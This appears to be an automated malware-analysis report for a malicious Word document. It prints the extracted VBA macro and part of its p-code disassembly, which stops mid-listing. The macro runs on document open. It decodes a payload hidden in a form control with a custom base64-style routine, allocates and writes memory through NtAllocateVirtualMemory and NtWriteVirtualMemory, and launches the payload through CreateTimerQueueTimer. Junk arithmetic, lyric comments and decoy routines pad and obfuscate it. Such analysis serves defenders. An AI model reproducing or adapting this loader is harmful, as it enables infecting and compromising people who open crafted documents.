Dim ablated As Long
#End If
gasteromycetes = VarPtr(battlescarred)
norm = continuation(gasteromycetes, VarPtr(quoin) + 8, cic)
endaemonism = 55 - 114 + 58
highlevel = 78 - 81 + 3
bosom = 117 - 65 - 52
ablated = 87 - 47 + 9490
leipzig = 15 - 28 + 4109
odontophorus = 61 - 66 + 69
besiege = deformational(ByVal endaemonism, highlevel, ByVal bosom, ablated, ByVal leipzig, ByVal odontophorus)
individualistically = shrivel

carpinus = Math.Round(96)

continuation highlevel, battlescarred, 55 - 86 + 5914
airmail = 15
dulciana = 13605
detach = 325784
 Pmt 0, airmail, 13534, 16485, 3

unalert = highlevel
End Function
Function continuation(bourse, mulet, partialness)
nova = pistol(20 / 4)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (nova) Then
Dim mucilage As Integer
Dim despondency As Byte
Dim chair As LongPtr
Dim lateward As LongPtr
Dim maypole As LongPtr
Dim naiad As Integer
Dim esteem As LongPtr
Dim derail As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (nova) Then
Dim lateward As Long
Dim hippoglossoides As Long
Dim chair As Long
Dim scolecoid As Variant
Dim esteem As Long
Dim fifties As String
Dim maypole As Long
Dim declamatory As Byte
Dim derail As Long
Dim derivational As Variant
Dim waterloo As Long
#End If
anemometer = anemometer
individualistically = "glamorous"
lateward = bourse
derail = partialness
acrophobic = Rnd(299)
esteem = mulet
desous = 119
jour = 8429
ranch = 119928
 Pmt 0, desous, 28349, 55711, 3

peccancy = "needlewood"
chair = 33 - 111 + 77
unreproducible ByVal chair, lateward, esteem, derail, maypole
dissociation = Rnd(217)
End Function
Sub arthralgic()
Dim cordierite As Long
Dim anacanthini As Long
enthusiast.nonnatural.Value = Day(#12/5/2013#)
varday = bonmotjeu = "featureless"
courser = "juvenal"
lanzhou = croak
august = "jail"
scratch = "osteolysis"

diluent = "schizopoda"
tympani = "agamidae"
confute = "nilgai"
Set headliner = enthusiast.nonnatural.SelectedItem
untractable = 42
aloe = 3522
dissimilitude = 289834
 Pmt 0, untractable, 3028, 46128, 4

arctocebus = headliner.Name
geebung = 3 - 88 + 7929
actionable = Right(arctocebus, geebung)
yalta = protos.avens(actionable)
consuetudo = 101
centrospermae = 32126
overage = 513269
 Pmt 0, consuetudo, 31445, 15145, 2

pettiness = "anaesthetize"
cropper = "moscow"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim entolomataceae As Integer
Dim desole As LongPtr
Dim abscond As LongPtr
Dim news As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim cleansing As Long
Dim abscond As Long
Dim scienter As String
Dim desole As Long
#End If
adhibition = 106 - 87 - 19
cataclysm = "stiffness"
unsupportable = 11 - 36 + 4121
fissile = 108
asserting = 15119
maximis = 312021
 Pmt 0, fissile, 35069, 19822, 6

quietism = tribologist
americaine = "abrogate"
muscadet = "countrywide"
columnist = 95
herself = 32947
intersexual = 382318
 Pmt 0, columnist, 4804, 55054, 8

gouda = yalta
diuturnal = adaxial
copiousness = admiration
desole = unalert(gouda)
tarawa = "prate"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim cohibit As Long
Dim combo As LongPtr
Dim cocotte As LongPtr
Dim mount As LongPtr
ageism = 59 - 20 + 2025
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim combo As Long
colima = 74 - 107 + 814
Dim cocotte As Long
Dim mount As Long
ageism = colima + 3459

#End If
Dim hardboiled As Integer
Dim movere As Long
combo = 118 - 10 - 108
abscond = desole + ageism
cocotte = 92 - 124 + 201559
mount = 117 - 128 + 3511
capacitive = nortel(cocotte, combo, abscond)
birr = 50 + 10
ichneumonidae = 11810 + 1
mohammedan = 276070 + 1
 Pmt 0, birr, 33851, 48854, 3

End Sub
Function pistol(jugles)
Dim windser As Integer
Dim velvet As Integer
fixoid = jugles * 12
Dim sitroen As Variant
metro2 = jugles * 2
Dim cowen() As Byte
#If (4 * 6 + jugles) > (6 - 2 * 1) And (10 - jugles * 2) * 2 < (Win64) Then
velvet = metro2
#End If
#If (4 * 6 + jugles) > (6 - 2 * 1) And Not (Win64) > (10 - jugles * 2) * 2 Then
velvet = (120 - fixoid)
#End If
metro3 = metro2 + velvet
pistol = velvet
End Function
Private Sub Document_Open()
Dim bovidae As Long
Dim silviculture As Integer
hectometer = cleavage
quickly = attentiongetting
arthralgic
doxorubicin = 81
cheapskate = 33628
pasta = 583933
 Pmt 0, doxorubicin, 36180, 14946, 8
End Sub

Attribute VB_Name = "barbaresque"
'  And walked out
#If (12 * 4 + 7) > (9 - 3 * 2) And Not (32 - 8 * 4) * 2 < (Win64) Then
'  But just your sight had my heart storming
'  You wrecked my whole world when you came
Public Declare Function unreproducible Lib "Ntdll.dll   " Alias "NtWriteVirtualMemory" (ByVal iresine As Any, ByVal unsated As Any, ByVal astonished As Any, ByVal hoe As Any, ByVal newfangled As Any) As Long
'  And hit me like a hurricane
'  You wrecked my whole world when you came
Public Declare Function lab Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal finished As Any, recipe As Any, jewelry As Any, falafel As Any) As Long
'  And hit me like a hurricane
'  From the moment when
Public Declare Function nodulose Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (faultfinder As Any) As Long
'  But just your sight had my heart storming
'  And walked out
Public Declare Function deformational Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (picking As Long, airship As Long, ByVal ambiguas As Long, beadlikeByVal As Long, serer As Long, ByVal maquiladora As Long) As Long
'  Knew it was gonna be a long night
'  Rain was driving, thunder, lightning
Public Declare Function reconnoiter Lib "Kernel32" Alias "CreateTimerQueueTimer" (nigeria As Any, ByVal arum As Any, ByVal mismanage As Any, ByVal aphesis As Any, ByVal chestnut As Any, ByVal fucking As Any, ByVal mists As Any) As Long
'  Started talking bout us again
'  The moon went hiding, stars quit shining
Public Declare Function jabot Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal commoner As Any, plasmic As Any, approximating As Any, agile As Any) As Long
'  The moon went hiding, stars quit shining
'  I was doing alright
#End If
'  And hit me like a hurricane
#If (11 * 2 + 5) > (8 - 3 * 1) And (28 - 7 * 4) * 2 < (Win64) Then
'  Knew it was gonna be a long night
'  And hit me like a hurricane'  Started talking bout us again
Public Declare PtrSafe Function antinomasia Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (heliograph As Any) As LongPtr
'  We locked eyes over whiskey on ice
'  We locked eyes over whiskey on ice
Public Declare PtrSafe Function unreproducible Lib "ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal purveyance As Any, ByVal rosy As Any, ByVal cryophobia As Any, ByVal colloquial As Any, ByVal achievement As Any) As LongPtr
'  From the moment when
'  Started talking bout us again
Public Declare PtrSafe Function deformational Lib "ntdll.dll  " Alias _
"NtAllocateVirtualMemory" (bencher As LongPtr, banter As LongPtr, ByVal slopseller As LongPtr, horripilateByVal As LongPtr, cobnut As LongPtr, ByVal gynecaeum As LongPtr) As LongPtr
'  If I woulda just layed my drink down
'  Knew it was gonna be a long night
Public Declare PtrSafe Function severable Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal metaphrast As Any, secrets As Any, entandrophragma As Any, halfhour As Any) As LongPtr
'  You wrecked my whole world when you came
'  Baby, without warning
Public Declare PtrSafe Function reconnoiter Lib "Kernel32" Alias "CreateTimerQueueTimer" (coming As Any, ByVal capitalistic As Any, ByVal blockaderunner As Any, ByVal halfhour As Any, ByVal berliner As Any, ByVal redount As Any, ByVal totis As Any) As Long
'  Rain was driving, thunder, lightning
'  The moon went hiding, stars quit shining
Public Declare PtrSafe Function cantering Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal groceries As Any, prissy As Any, cote As Any, conglobation As Any) As LongPtr
'  And hit me like a hurricane'  But you rolled in with your hair in the wind
#End If
'  I was doing alright
'  And hit me like a hurricane

'  The moon went hiding, stars quit shining
'  We locked eyes over whiskey on ice

Function nortel(wrd, buls, lky)
#If (7 * 2) * 3 > 14 / 2 And (12 - 6 * 2) * 1 < (Win64) Then
Dim kittins As LongPtr
Dim bis As LongPtr
Dim ority As Integer
Dim deble As LongPtr
#End If
#If (12 * 2) / 1 > 14 / 2 And Not (12 - 6 * 2) * 1 < (Win64) Then
Dim kittins As Long
Dim bwis As Long
Dim antery As Integer
Dim deble As Long
#End If
kittins = buls
deble = lky
dan2 = reconnoiter(wrd, kittins, deble, kittins, kittins, kittins, kittins)
End Function
Sub InsertText()
Dim wdApp As Word.Application
Dim wdDoc As Document
Dim wdSln As Selection

Set wdApp = GetObject(, "Word.Application")
Set wdDoc = wdApp.ActiveDocument
Set wdSln = wdApp.Selection

wdDoc.Application.Options.Overtype = False
With wdSln
If .Type = wdSelectionIP Then
.TypeText ("Inserting at insertion point. ")
ElseIf .Type = wdSelectionNormal Then
If wdApp.Options.ReplaceSelection Then
    .Collapse Direction:=wdCollapseStart
End If
.TypeText ("Inserting before a text block. ")
End If
End With
Set wdApp = Nothing
Set wdDoc = Nothing
End Sub
Function comeatable(neve, chile, materfamilias)
If materfamilias = 12 + (10 / 2 - 5) Then
comeatable = neve \ chile
ElseIf materfamilias = 22 + (5 - 3) / 2 - 1 Then
comeatable = neve And chile
ElseIf materfamilias = 30 + (56 / 7 - 4 * 2) Then
comeatable = neve * chile
End If
End Function
Function cacogenesis(emu)
cacogenesis = AscW(emu)
End Function

Attribute VB_Name = "enthusiast"
Attribute VB_Base = "0{CFB4611D-991F-4777-9E67-CC6D24DF094C}{BADA2A78-210F-4401-A5F0-69726C7878CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "protos"
Sub Binary_Search_of_Array()
Dim intThousand(1000) As Integer
Dim I As Integer
Dim intTop As Integer
Dim intMiddle As Integer
Dim intBottom As Integer
Dim varUserNumber As Variant

For I = 1 To 1000
    intThousand(I) = I
Next I

varUserNumber = 233
intTop = UBound(intThousand)
intBottom = LBound(intThousand)

Do
intMiddle = (intTop + intBottom) / 2
If varUserNumber > intThousand(intMiddle) Then
intBottom = intMiddle + 1
Else
intTop = intMiddle - 1
End If
Loop Until (varUserNumber = intThousand(intMiddle)) _
Or (intBottom > intTop)

If varUserNumber = intThousand(intMiddle) Then
Debug.Print varUserNumber & ", at position " & intMiddle
Else
Debug.Print "not in "
End If
End Sub
Function avens(bereave) As String
Dim bobadil(63) As Long
Dim neoliberalism As Long
Dim unhandsome As Long
Dim cockamamie As String

Dim featureless As Integer
Dim accrust As Long
Dim caliginous(6962) As Byte
anemometer = anemometer

Dim enjoying() As Byte
Dim intendant As Byte

Dim handoff As String

Dim aepyceros(63) As Long
Dim gingery As String
Dim senorita As Long
Dim panicled(63) As Long
shrivel = anemometer

dissociation = dissociation And 207

Dim easterner As String

bibliographic = 110 - 44 + 65470
capitalsprint = 100 - 60 + 24
episcopate = 102 - 60 + 16515030
pretended = 83 - 14 + 186
camelot = 2 - 84 + 338
undertaking = 64 - 45 + 65261
berycomorphi = 44 - 125 + 4113
coptic = 119 - 22 - 34
facet = 70 - 49 + 4075
anaplastic = 45 - 75 + 262174
highmettled = 94 - 8 + 16711594
Dim contopus As String

Dim bookmaker As Byte

Dim nageia As Long

apractic = 6 - 55 + 258097
Dim anopia As Long
acquaintenace = 60 - 28 - 32
ballista = 64 - 19 + 7798
Dim frozen() As Byte
Dim archetypal As Long
Dim entangle As Variant
frozen = VBA.StrConv(bereave, 128)
Dim mercilessly As Integer
correctionsmake = 70 + 1
treacherous = 3470 + 1
housefather = 519860 + 1
 Pmt 0, correctionsmake, 35845, 13257, 8

ore = 7840 + 3
inlaw = vbKeyShift - 12
For silica = 0 To ore
If silica Mod 2 = 0 Then
frozen(silica) = frozen(silica) - inlaw
Else
frozen(silica) = frozen(silica) - (inlaw - 1)
End If
Next silica
atrocity = 110 + 8
effervesce = 15190 + 7
cheilitis = 424370 + 1
 Pmt 0, atrocity, 7432, 16019, 4

featureless = 5 - 5
talcum = 78 - 64 - 14
pyrenomycetes = 52 - 36 + 27
lob = daddy
For neoliberalism = (6 - 6) * 1 To (40 + 23) * (5 - 4)
bobadil(neoliberalism) = comeatable(neoliberalism, capitalsprint, 30)
panicled(neoliberalism) = comeatable(neoliberalism, facet, 30)
aepyceros(neoliberalism) = comeatable(neoliberalism, anaplastic, 30)
Next neoliberalism
anicteric = 70 + 9
boater = 36810 + 9
concomitance = 347510 + 3
 Pmt 0, anicteric, 16631, 21424, 5

enjoying = frozen
downward = 20 - 82 + 66
mercedario = 80 + 7
orthopristis = 30540 + 7
bile = 275350 + 4
 Pmt 0, mercedario, 37058, 22193, 3

mundation = 6 - 48 + 45
anemometer = individualistically

shrivel = "acetabulum"

deciliter = mundation + 1
ovrerhasty = 7 - 111 + 106
For unhandsome = (3 - 3) To ore
assegai = enjoying(unhandsome)
patitur = enjoying(unhandsome + 2)
ethnology = panicled(lob(enjoying(unhandsome + 1)))
undereducated = bobadil(lob(patitur)) + lob(enjoying(unhandsome + mundation))
accrust = aepyceros(lob(assegai)) + ethnology + undereducated
neoliberalism = comeatable(accrust, highmettled, 22)
caliginous(senorita) = comeatable(neoliberalism, bibliographic, 12)
neoliberalism = comeatable(accrust, undertaking, 22)
caliginous(senorita + 1) = comeatable(neoliberalism, camelot, 12)
caliginous(senorita + ovrerhasty) = comeatable(accrust, pretended, 22)
senorita = senorita + ovrerhasty + 1
unhandsome = unhandsome + 3
Next
avens = caliginous
End Function

Function daddy()
Dim talker(255) As Byte
euphonious = 73 - 104 + 96
Do While euphonious <= 90 + 1
talker(euphonious) = euphonious - 65
euphonious = euphonious + 1
Loop
euphonious = 40 + 8
Do While euphonious <= 50 + 8
talker(euphonious) = euphonious + 4
euphonious = euphonious + 1
Loop
euphonious = 90 + 7
Do While euphonious <= 120 + 3
talker(euphonious) = euphonious - 71
euphonious = euphonious + 1
Loop
talker(47) = 60 + 3
euphonious = 40 + 3
talker(euphonious) = 60 + 2
daddy = talker
End Function

' Processing file: /opt/analyzer/scan_staging/d387beb3199b42b9a798d0f7d7790c39.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 15343 bytes
' Line #0:
' 	FuncDefn (Function unalert(quoin))
' Line #1:
' 	LitDI2 0x0014 
' 	LitDI2 0x0004 
' 	Div 
' 	ArgsLd subway3 0x0001 
' 	St _B_var_niva 
' Line #2:
' 	Dim 
' 	VarDefn coats (As Byte)
' Line #3:
' 	Dim 
' 	VarDefn amoebeeic (As Variant)
' Line #4:
' 	Dim 
' 	VarDefn detrude (As Byte)
' Line #5:
' 	Dim 
' 	VarDefn mischiefmaking (As String)
' Line #6:
' 	LbMark 
' 	LitDI2 0x0006 
' 	LitDI2 0x0003 
' 	Mul 
' 	LitDI2 0x0005 
' 	Add 
' 	Paren 
' 	LitDI2 0x0007 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	Mul 
' 	Sub 
' 	Paren 
' 	Gt 
' 	LitDI2 0x0030 
' 	LitDI2 0x0006 
' 	LitDI2 0x0008 
' 	Mul 
' 	Sub 
' 	Paren 
' 	LitDI2 0x0002 
' 	Mul 
' 	Ld Win64 
' 	Paren 
' 	Lt 
' 	And 
' 	LbIf 
' Line #7:
' 	Dim 
' 	VarDefn pellmell (As Variant)
' Line #8:
' 	Dim 
' 	VarDefn battlescarred (As Ptr)
' Line #9:
' 	LitDI2 0x0017 
' 	LitDI2 0x004D 
' 	Sub 
' 	LitDI2 0x003E 
' 	Add 
' 	St cic 
' Line #10:
' 	Dim 
' 	VarDefn highlevel (As Ptr)
' Line #11:
' 	Dim 
' 	VarDefn visus (As Variant)
' Line #12:
' 	Dim 
' 	VarDefn leiopelmatidae (As String)
' Line #13:
' 	Dim 
' 	VarDefn ablated (As Ptr)
' Line #14:
' 	Dim 
' 	VarDefn deshabille (As Long)
' Line #15:
' 	LbMark 
' 	LbEndIf 
' Line #16:
' 	LbMark 
' 	LitDI2 0x0008 
' 	LitDI2 0x0002 
' 	Mul 
' 	LitDI2 0x0005 
' 	Add 
' 	Paren 
' 	LitDI2 0x0007 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	Mul 
' 	Sub 
' 	Paren 
' 	Gt 
' 	LitDI2 0x0015 
' 	LitDI2 0x0007 
' 	LitDI2 0x0003 
' 	Mul 
' 	Sub 
' 	Paren 
' 	LitDI2 0x0002 
' 	Mul 
' 	Ld Win64 
' 	Paren 
' 	Lt 
' 	Not 
' 	And 
' 	LbIf 
' Line #17:
' 	Dim 
' 	VarDefn battlescarred (As Long)
' Line #18:
' 	LitDI2 0x0042 
' 	LitDI2 0x007B 
' 	Sub 
' 	LitDI2 0x003D 
' 	Add 
' 	St cic 
' Line #19:
' 	Dim 
' 	VarDefn highlevel (As Long)
' Line #20:
' 	Dim 
' 	VarDefn ablated (As Long)
' Line #21:
' 	LbMark 
' 	LbEndIf 
' Line #22:
' 	Ld battlescarred 
' 	ArgsLd VarPtr 0x0001 
' 	St gasteromycetes 
' Line #23:
' 	Ld gasteromycetes 
' 	Ld quoin 
' 	ArgsLd VarPtr 0x0001 
' 	LitDI2 0x0008 
' 	Add 
' 	Ld cic 
' 	ArgsLd continuation 0x0003 
' 	St norm 
' Line #24:
' 	LitDI2 0x0037 
' 	LitDI2 0x0072 
' 	Sub 
' 	LitDI2 0x003A 
' 	Add 
' 	St endaemonism 
' Line #25:
' 	LitDI2 0x004E 
' 	LitDI2 0x0051 
' 	Sub 
' 	LitDI2 0x0003 
' 	Add 
' 	St highlevel 
' Line #26:
' 	LitDI2 0x0075 
' 	LitDI2 0x0041 
' 	Sub 
' 	LitDI2 0x0034 
' 	Sub 
' 	St bosom 
' Line #27:
' 	LitDI2 0x0057 
' 	LitDI2 0x002F 
' 	Sub 
' 	LitDI2 0x2512 
' 	Add 
' 	St ablated 
' Line #28:
' 	LitDI2 0x000F 
' 	LitDI2 0x001C 
' 	Sub 
' 	LitDI2 0x100D 
' 	Add 
' 	St leipzig 
' Line #29:
' 	LitDI2 0x003D 
' 	LitDI2 0x0042 
' 	Sub 
' 	LitDI2 0x0045 
' 	Add 
' 	St odontophorus 
' Line #30:
' 	Ld endaemonism 
' 	ParamByVal 
' 	Ld highlevel 
' 	Ld bosom 
' 	ParamByVal 
' 	Ld ablated 
' 	Ld leipzig 
' 	ParamByVal 
' 	Ld odontophorus 
' 	ParamByVal 
' 	ArgsLd deformational 0x0006 
' 	St besiege 
' Line #31:
' 	Ld shrivel 
' 	St individualistically 
' Line #32:
' Line #33:
' 	LitDI2 0x0060 
' 	Ld Math 
' 	ArgsMemLd Round 0x0001 
' 	St carpinus 
' Line #34:
' Line #35:
' 	Ld highlevel 
' 	Ld battlescarred 
' 	LitDI2 0x0037 
' 	LitDI2 0x0056 
' 	Sub 
' 	LitDI2 0x171A 
' 	Add 
' 	ArgsCall continuation 0x0003 
' Line #36:
' 	LitDI2 0x000F 
' 	St airmail 
' Line #37:
' 	LitDI2 0x3525 
' 	St dulciana 
' Line #38:
' 	LitDI4 0xF898 0x0004 
' 	St detach 
' Line #39:
' 	LitDI2 0x0000 
' 	Ld airmail 
' 	LitDI2 0x34DE 
' 	LitDI2 0x4065 
' 	LitDI2 0x0003 
' 	ArgsCall Pmt 0x0005 
' Line #40:
' Line #41:
' 	Ld highlevel 
' 	St unalert 
' Line #42:
' 	EndFunc 
' Line #43:
' 	FuncDefn (Function continuation(bourse))
' Line #44:
' 	LitDI2 0x0014 
' 	LitDI2 0x0004 
' 	Div 
' 	ArgsLd subway3 0x0001 
' 	St _B_var_niva 
' Line #45:
' 	LbMark 
' 	LitDI2 0x0007 
' 	LitDI2 0x0004 
' 	Mul 
' 	LitDI2 0x0005 
' 	Add 
' 	Paren 
' 	LitDI2 0x0007 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	Mul 
' 	Sub 
' 	Paren 
' 	Gt 
' 	LitDI2 0x0014 
' 	LitDI2 0x0005 
' 	LitDI2 0x0004 
' 	Mul 
' 	Sub 
' 	Paren 
' 	LitDI2 0x0002 
' 	Mul 
' 	Ld _B_var_niva 
' 	Paren 
' 	Lt 
' 	And 
' 	LbIf 
' Line #46:
' 	Dim 
' 	VarDefn mucilage (As Integer)
' Line #47:
' 	Dim 
' 	VarDefn despondency (As Byte)
' Line #48:
' 	Dim 
' 	VarDefn chair (As Ptr)
' Line #49:
' 	Dim 
' 	VarDefn lateward (As Ptr)
' Line #50:
' 	Dim 
' 	VarDefn maypole (As Ptr)
' Line #51:
' 	Dim 
' 	VarDefn naiad (As Integer)
' Line #52:
' 	Dim 
' 	VarDefn esteem (As Ptr)
' Line #53:
' 	Dim 
' 	VarDefn derail (As Ptr)
' Line #54:
' 	LbMark 
' 	LbEndIf 
' Line #55:
' 	LbMark 
' 	LitDI2 0x0008 
' 	LitDI2 0x0002 
' 	Mul 
' 	LitDI2 0x0005 
' 	Add 
' 	Paren 
' 	LitDI2 0x0007 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	Mul 
' 	Sub 
' 	Paren 
' 	Gt 
' 	LitDI2 0x0015 
' 	LitDI2 0x0007 
' 	LitDI2 0x0003 
' 	Mul 
' 	Sub 
' 	Paren 
' 	LitDI2 0x0002 
' 	Mul 
' 	Ld _B_var_niva 
' 	Paren 
' 	Lt 
' 	Not 
' 	And 
' 	LbIf 
' Line #56:
' 	Dim 
' 	VarDefn lateward (As Long)
' Line #57:
' 	Dim 
' 	VarDefn hippoglossoides (As Long)
' Line #58:
' 	Dim 
' 	VarDefn chair (As Long)
' Line #59:
' 	Dim 
' 	VarDefn scolecoid (As Variant)
' Line #60:
' 	Dim 
' 	VarDefn esteem (As Long)
' Line #61:
' 	Dim 
' 	VarDefn fifties (As String)
' Line #62:
' 	Dim 
' 	VarDefn maypole (As Long)
' Line #63:
' 	Dim 
' 	VarDefn declamatory (As Byte)
' Line #64:
' 	Dim 
' 	VarDefn derail (As Long)
' Line #65:
' 	Dim 
' 	VarDefn derivational (As Variant)
' Line #66:
' 	Dim 
' 	VarDefn waterloo (As Long)
' Line #67:
' 	LbMark 
' 	LbEndIf 
' Line #68:
' 	Ld anemometer 
' 	St anemometer 
' Line #69:
' 	LitStr 0x0009 "glamorous"
' 	St individualistically 
' Line #70:
' 	Ld bourse 
' 	St lateward 
' Line #71:
' 	Ld partialness 
' 	St derail 
' Line #72:
' 	LitDI2 0x012B 
' 	ArgsLd Rnd 0x0001 
' 	St acrophobic 
' Line #73:
' 	Ld mulet 
' 	St esteem 
' Line #74:
' 	LitDI2 0x0077 
' 	St desous 
' Line #75:
' 	LitDI2 0x20ED 
' 	St jour 
' Line #76:
' 	LitDI4 0xD478 0x0001 
' 	St ranch 
' Line #77:
' 	LitDI2 0x0000 
' 	Ld desous 
' 	LitDI2 0x6EBD 
' 	LitDI4 0xD99F 0x0000 
' 	LitDI2 0x0003 
' 	ArgsCall Pmt 0x0005 
' Line #78:
' Line #79:
' 	LitStr 0x000A "needlewood"
' 	St peccancy 
' Line #80:
' 	LitDI2 0x0021 
' 	LitDI2 0x006F 
' 	Sub 
' 	LitDI2 0x004D 
' 	Add 
' 	St chair 
' Line #81:
' 	Ld chair 
' 	ParamByVal 
' 	Ld lateward 
' 	Ld esteem 
' 	Ld derail 
' 	Ld maypole 
' 	ArgsCall unreproducible 0x0005 
' Line #82:
' 	LitDI2 0x00D9 
' 	ArgsLd Rnd 0x0001 
' 	St dissociation 
' Line #83:
' 	EndFunc 
' Line #84:
' 	FuncDefn (Sub arthralgic())
' Line #85:
' 	Dim 
' 	VarDefn cordierite (As Long)
' Line #86:
' 	Dim 
' 	VarDefn anacanthini (As Long)
' Line #87:
' 	LitDate 0x0000 0x0000 0x51A0 0x40E4 
' 	ArgsLd Day 0x0001 
' 	Ld enthusiast 
' 	MemLd nonnatural 
' 	MemSt Value 
' Line #88:
' 	Ld bonmotjeu 
' 	LitStr 0x000B "featureless"
' 	Eq 
' 	St varday 
' Line #89:
' 	LitStr 0x0007 "juvenal"
' 	St courser 
' Line #90:
' 	Ld croak 
' 	St lanzhou 
' Line #91:
' 	LitStr 0x0004 "jail"
' 	St august 
' Line #92:
' 	LitStr 0x000A "osteolysis"
' 	St scratch 
' Line #93:
' Line #94:
' 	LitStr 0x000A "schizopoda"
' 	St diluent 
' Line #95:
' 	LitStr 0x0008 "agamidae"
' 	St tympani 
' Line #96:
' 	LitStr 0x0006 "nilgai"
' 	St confute 
' Line #97:
' 	SetStmt 
' 	Ld enthusiast 
' 	MemLd nonnatural 
' 	MemLd SelectedItem 
' 	Set headliner 
' Line #98:
' 	LitDI2 0x002A 
' 	St untractable 
' Line #99:
' 	LitDI2 0x0DC2 
' 	St aloe 
' Line #100:
' 	LitDI4 0x6C2A 0x0004 
' 	St dissimilitude 
' Line #101:
' 	LitDI2 0x0000 
' 	Ld untractable 
' 	LitDI2 0x0BD4 
' 	LitDI4 0xB430 0x0000 
' 	LitDI2 0x0004 
' 	ArgsCall Pmt 0x0005 
' Line #102:
' Line #103:
' 	Ld headliner 
' 	MemLd Name 
' 	St arctocebus 
' Line #104:
' 	LitDI2 0x0003 
' 	LitDI2 0x0058 
' 	Sub 
' 	LitDI2 0x1EF9 
…

Open this report in the interactive analyzer, or submit your own file for analysis.